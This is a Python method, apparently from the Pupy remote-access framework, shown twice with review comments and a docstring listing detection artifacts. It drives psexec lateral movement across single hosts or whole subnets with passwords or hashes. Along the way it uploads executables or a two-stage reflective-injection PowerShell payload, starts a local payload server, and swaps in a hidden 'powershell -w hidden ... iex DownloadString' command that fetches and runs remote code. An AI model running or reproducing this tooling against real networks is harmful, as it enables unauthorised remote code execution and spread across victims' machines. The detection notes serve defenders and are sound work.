def run(self, args):
    """Stage optional payload files, then call ``pupyutils.psexec.connect`` once per target host.

    Control flow as visible in this method:
      1. ``args.target[0]`` is expanded with ``IPNetwork`` when it contains a
         ``/``; otherwise it is wrapped in a one-element list.
      2. When ``args.file`` or ``args.ps1`` is set, files are built in the
         local temp dir under random 10-letter names and handed to
         ``upload()`` together with the client connection. ``remote_path``
         is the staging directory on the client; ``dst_folder`` is the
         share-derived folder passed on to ``connect``.
      3. When ``args.ps1_oneliner`` is set, a local ``pupygen.py`` server is
         spawned with ``Popen`` and ``args.command`` is overwritten with a
         PowerShell ``DownloadString`` + ``iex`` one-liner pointing at it.
      4. Four packages are loaded on the client, then ``connect`` is called
         for every host inside ``redirected_stdo``.
      5. The local server (if any) is terminated, or cleanup reminders are
         printed for the two PowerShell stage files.

    Args:
        args: parsed module arguments. Fields read here: target, file, ps1,
            ps1_oneliner, ps1_port, share, port, user, passwd, hash, command,
            domain, execm. ``args.command`` is *written* in the oneliner case.

    Returns:
        None. Returns early (after ``self.error``) when ``args.file`` does not
        exist, does not end in ``.exe``, or when the local server has already
        exited two seconds after launch.

    Artifacts this code emits, useful as detection reference (all literals
    appear below): randomly named ``.exe``/``.txt`` files under
    ``C:\\Windows\\TEMP`` or the share root; a
    ``powershell.exe -w hidden -noni -nop -c "iex(...DownloadString('http://<ip>:<port>/eiloShaegae1'))"``
    command line; a ``cat <file> | Out-String | IEX`` launcher script.
    """
    # A CIDR target is expanded via IPNetwork; a single host is wrapped in a
    # list so the per-host loop below works the same way for both.
    if "/" in args.target[0]:
        hosts = IPNetwork(args.target[0])
    else:
        hosts = list()
        hosts.append(args.target[0])
    # Defaults that reach connect() when nothing is staged.
    ext = ''
    remote_path = ''
    dst_folder = ''
    file_to_upload = []
    if args.file or args.ps1:
        # Local scratch dir: every staged file is written here first.
        tmp_dir = tempfile.gettempdir()
        # Staging path on the client: %ALLUSERSPROFILE% resolved through the
        # connection's remote os.path module on Windows, /tmp/ otherwise.
        if self.client.is_windows():
            remote_path = '%s\\' % self.client.conn.modules[
                'os.path'].expandvars("%ALLUSERSPROFILE%")
        else:
            remote_path = '/tmp/'
        # Folder handed to connect(): C:\Windows\TEMP for the C$ share ...
        if args.share == 'C$':
            dst_folder = "C:\\Windows\\TEMP\\"
        # ... otherwise the share name with '$' turned into ':' (e.g. 'D$' -> 'D:\').
        else:
            dst_folder = '%s\\' % args.share.replace('$', ':')
        # Executable to upload: must exist locally and carry an .exe suffix
        # (suffix check only; the content is not inspected).
        if args.file:
            if not os.path.exists(args.file):
                self.error('File not found: %s' % args.file)
                return
            if not args.file.endswith('.exe'):
                self.error('Only executable files could be uploaded')
                return
            ext = '.exe'
            # 10 distinct ASCII letters from random.sample — `random`, not
            # `secrets`, so the name is not cryptographically unpredictable.
            random_name = ''.join(random.sample(string.ascii_letters, 10)) + ext
            shutil.copy(args.file, tmp_dir + os.sep + random_name)
            file_to_upload = [random_name]
        # PowerShell mode: two text stages. The first is a launcher (wrapped by
        # create_ps_command) that reads the second from dst_folder and pipes it
        # to IEX; the second is whatever getInvokeReflectivePEInjectionWithDLLEmbedded
        # returns for the client config (opaque helper, body not visible here).
        else:
            ext = '.txt'
            first_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext
            second_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext
            file_to_upload = [first_stage, second_stage]
            launcher = """cat {invoke_reflective_random_name} | Out-String | IEX""".format(
                invoke_reflective_random_name=dst_folder + second_stage)
            launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
            # NOTE(review): the handle from open() is never explicitly closed;
            # flushing relies on refcount finalisation. `with open(...)` is the idiom.
            open(tmp_dir + os.sep + first_stage, 'w').write(launcher)
            # NOTE: '%' binds tighter than '+', so this formats tmp_dir alone and
            # then appends os.sep + first_stage; the output is right by coincidence.
            self.success('first stage created: %s' % tmp_dir + os.sep + first_stage)
            command = getInvokeReflectivePEInjectionWithDLLEmbedded(
                self.client.get_conf())
            open(tmp_dir + os.sep + second_stage, 'w').write(command)
            self.success('second stage created: %s' % tmp_dir + os.sep + second_stage)
        # Push each staged file from the local temp dir to remote_path on the
        # client via upload() (opaque helper). Loop variable shadows builtin `file`.
        for file in file_to_upload:
            src = tmp_dir + os.sep + file
            dst = remote_path + file
            self.info("Uploading file to {0}".format(dst))
            upload(self.client.conn, src, dst)
            self.success("File uploaded")
    if args.ps1_oneliner:
        # Remote call on the client's pupy module; assumed to return 'host:port'
        # (rsplit on the last ':' keeps IPv6-style hosts intact) — TODO confirm.
        res = self.client.conn.modules['pupy'].get_connect_back_host()
        ip, port = res.rsplit(':', 1)
        cmd = '%s/pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port %s connect --host %s:%s' % (
            os.getcwd(), str(args.ps1_port), ip, port)
        self.warning('starting the local server')
        # NOTE(review): cmd.split(' ') mis-tokenises when os.getcwd() contains
        # spaces; an explicit argv list would avoid that.
        process = Popen(cmd.split(' '), stdout=PIPE, stderr=PIPE, stdin=PIPE)
        time.sleep(2)
        # Readiness check is only "still alive after 2 s": poll() is non-None
        # solely when the child has already exited, so a failure that surfaces
        # later (e.g. a port clash reported after startup) is not caught here.
        if process.poll():
            self.error(
                'the server has not been launched, check if the port %s or if the file %s/pupygen.py exists' % (str(args.ps1_port), os.getcwd()))
            return
        self.success('server started (pid: %s)' % process.pid)
        # Any user-supplied args.command is discarded in this mode.
        args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % (
            ip, str(args.ps1_port))
    # Packages loaded on the client before its psexec module is used.
    self.info("Loading dependencies")
    self.client.load_package("impacket")
    self.client.load_package('ntpath')
    self.client.load_package("calendar")
    self.client.load_package("pupyutils.psexec")
    # redirected_stdo presumably mirrors the client's stdout/stderr into this
    # session; its implementation is not visible here.
    with redirected_stdo(self.client.conn):
        for host in hosts:
            self.info("Connecting to the remote host: %s" % host)
            # All remote psexec work happens inside the client-side connect();
            # this method only marshals the arguments.
            self.client.conn.modules["pupyutils.psexec"].connect(
                host, args.port, args.user, args.passwd, args.hash, args.share,
                file_to_upload, remote_path, dst_folder, args.command, args.domain, args.execm)
    if args.ps1_oneliner:
        # NOTE(review): only reached on the normal path — if connect() raises,
        # the local server is left running (no try/finally).
        self.warning('stopping the local server (pid: %s)' % process.pid)
        process.terminate()
    elif args.ps1:
        # NOTE(review): first_stage/second_stage are bound only in the
        # PowerShell branch above; with both args.file and args.ps1 set this
        # raises NameError. Same '%'-before-'+' precedence as the success messages.
        self.warning('Do not forget to remove the file: %s' % dst_folder + first_stage)
        self.warning('Do not forget to remove the file: %s' % dst_folder + second_stage)
def run(self, args):
    """Stage optional payload files, then call ``pupyutils.psexec.connect`` once per target host.

    Control flow as visible in this method:
      1. ``args.target[0]`` is expanded with ``IPNetwork`` when it contains a
         ``/``; otherwise it is wrapped in a one-element list.
      2. When ``args.file`` or ``args.ps1`` is set, files are built in the
         local temp dir under random 10-letter names and handed to
         ``upload()`` together with the client connection. ``remote_path``
         is the staging directory on the client; ``dst_folder`` is the
         share-derived folder passed on to ``connect``.
      3. When ``args.ps1_oneliner`` is set, a local ``pupygen.py`` server is
         spawned with ``Popen`` and ``args.command`` is overwritten with a
         PowerShell ``DownloadString`` + ``iex`` one-liner pointing at it.
      4. Four packages are loaded on the client, then ``connect`` is called
         for every host inside ``redirected_stdo``.
      5. The local server (if any) is terminated, or cleanup reminders are
         printed for the two PowerShell stage files.

    Args:
        args: parsed module arguments. Fields read here: target, file, ps1,
            ps1_oneliner, ps1_port, share, port, user, passwd, hash, command,
            domain, execm. ``args.command`` is *written* in the oneliner case.

    Returns:
        None. Returns early (after ``self.error``) when ``args.file`` does not
        exist, does not end in ``.exe``, or when the local server has already
        exited two seconds after launch.

    Artifacts this code emits, useful as detection reference (all literals
    appear below): randomly named ``.exe``/``.txt`` files under
    ``C:\\Windows\\TEMP`` or the share root; a
    ``powershell.exe -w hidden -noni -nop -c "iex(...DownloadString('http://<ip>:<port>/eiloShaegae1'))"``
    command line; a ``cat <file> | Out-String | IEX`` launcher script.
    """
    # A CIDR target is expanded via IPNetwork; a single host is wrapped in a
    # list so the per-host loop below works the same way for both.
    if "/" in args.target[0]:
        hosts = IPNetwork(args.target[0])
    else:
        hosts = list()
        hosts.append(args.target[0])
    # Defaults that reach connect() when nothing is staged.
    ext = ''
    remote_path = ''
    dst_folder = ''
    file_to_upload = []
    if args.file or args.ps1:
        # Local scratch dir: every staged file is written here first.
        tmp_dir = tempfile.gettempdir()
        # Staging path on the client: %ALLUSERSPROFILE% resolved through the
        # connection's remote os.path module on Windows, /tmp/ otherwise.
        if self.client.is_windows():
            remote_path = '%s\\' % self.client.conn.modules['os.path'].expandvars("%ALLUSERSPROFILE%")
        else:
            remote_path = '/tmp/'
        # Folder handed to connect(): C:\Windows\TEMP for the C$ share ...
        if args.share == 'C$':
            dst_folder = "C:\\Windows\\TEMP\\"
        # ... otherwise the share name with '$' turned into ':' (e.g. 'D$' -> 'D:\').
        else:
            dst_folder = '%s\\' % args.share.replace('$', ':')
        # Executable to upload: must exist locally and carry an .exe suffix
        # (suffix check only; the content is not inspected).
        if args.file:
            if not os.path.exists(args.file):
                self.error('File not found: %s' % args.file)
                return
            if not args.file.endswith('.exe'):
                self.error('Only executable files could be uploaded')
                return
            ext = '.exe'
            # 10 distinct ASCII letters from random.sample — `random`, not
            # `secrets`, so the name is not cryptographically unpredictable.
            random_name = ''.join(random.sample(string.ascii_letters, 10)) + ext
            shutil.copy(args.file, tmp_dir + os.sep + random_name)
            file_to_upload = [random_name]
        # PowerShell mode: two text stages. The first is a launcher (wrapped by
        # create_ps_command) that reads the second from dst_folder and pipes it
        # to IEX; the second is whatever getInvokeReflectivePEInjectionWithDLLEmbedded
        # returns for the client config (opaque helper, body not visible here).
        else:
            ext = '.txt'
            first_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext
            second_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext
            file_to_upload = [first_stage, second_stage]
            launcher = """cat {invoke_reflective_random_name} | Out-String | IEX""".format(invoke_reflective_random_name=dst_folder + second_stage)
            launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
            # NOTE(review): the handle from open() is never explicitly closed;
            # flushing relies on refcount finalisation. `with open(...)` is the idiom.
            open(tmp_dir + os.sep + first_stage, 'w').write(launcher)
            # NOTE: '%' binds tighter than '+', so this formats tmp_dir alone and
            # then appends os.sep + first_stage; the output is right by coincidence.
            self.success('first stage created: %s' % tmp_dir + os.sep + first_stage)
            command = getInvokeReflectivePEInjectionWithDLLEmbedded(self.client.get_conf())
            open(tmp_dir + os.sep + second_stage, 'w').write(command)
            self.success('second stage created: %s' % tmp_dir + os.sep + second_stage)
        # Push each staged file from the local temp dir to remote_path on the
        # client via upload() (opaque helper). Loop variable shadows builtin `file`.
        for file in file_to_upload:
            src = tmp_dir + os.sep + file
            dst = remote_path + file
            self.info("Uploading file to {0}".format(dst))
            upload(self.client.conn, src, dst)
            self.success("File uploaded")
    if args.ps1_oneliner:
        # Remote call on the client's pupy module; assumed to return 'host:port'
        # (rsplit on the last ':' keeps IPv6-style hosts intact) — TODO confirm.
        res=self.client.conn.modules['pupy'].get_connect_back_host()
        ip, port = res.rsplit(':', 1)
        cmd = '%s/pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port %s connect --host %s:%s' % (os.getcwd(), str(args.ps1_port), ip, port)
        self.warning('starting the local server')
        # NOTE(review): cmd.split(' ') mis-tokenises when os.getcwd() contains
        # spaces; an explicit argv list would avoid that.
        process = Popen(cmd.split(' '), stdout=PIPE, stderr=PIPE, stdin=PIPE)
        time.sleep(2)
        # Readiness check is only "still alive after 2 s": poll() is non-None
        # solely when the child has already exited, so a failure that surfaces
        # later (e.g. a port clash reported after startup) is not caught here.
        if process.poll():
            self.error('the server has not been launched, check if the port %s or if the file %s/pupygen.py exists' % (str(args.ps1_port), os.getcwd()))
            return
        self.success('server started (pid: %s)' % process.pid)
        # Any user-supplied args.command is discarded in this mode.
        args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % (ip, str(args.ps1_port))
    # Packages loaded on the client before its psexec module is used.
    self.info("Loading dependencies")
    self.client.load_package("impacket")
    self.client.load_package('ntpath')
    self.client.load_package("calendar")
    self.client.load_package("pupyutils.psexec")
    # redirected_stdo presumably mirrors the client's stdout/stderr into this
    # session; its implementation is not visible here.
    with redirected_stdo(self.client.conn):
        for host in hosts:
            self.info("Connecting to the remote host: %s" % host)
            # All remote psexec work happens inside the client-side connect();
            # this method only marshals the arguments.
            self.client.conn.modules["pupyutils.psexec"].connect(host, args.port, args.user, args.passwd, args.hash, args.share, file_to_upload, remote_path, dst_folder, args.command, args.domain, args.execm)
    if args.ps1_oneliner:
        # NOTE(review): only reached on the normal path — if connect() raises,
        # the local server is left running (no try/finally).
        self.warning('stopping the local server (pid: %s)' % process.pid)
        process.terminate()
    elif args.ps1:
        # NOTE(review): first_stage/second_stage are bound only in the
        # PowerShell branch above; with both args.file and args.ps1 set this
        # raises NameError. Same '%'-before-'+' precedence as the success messages.
        self.warning('Do not forget to remove the file: %s' % dst_folder + first_stage)
        self.warning('Do not forget to remove the file: %s' % dst_folder + second_stage)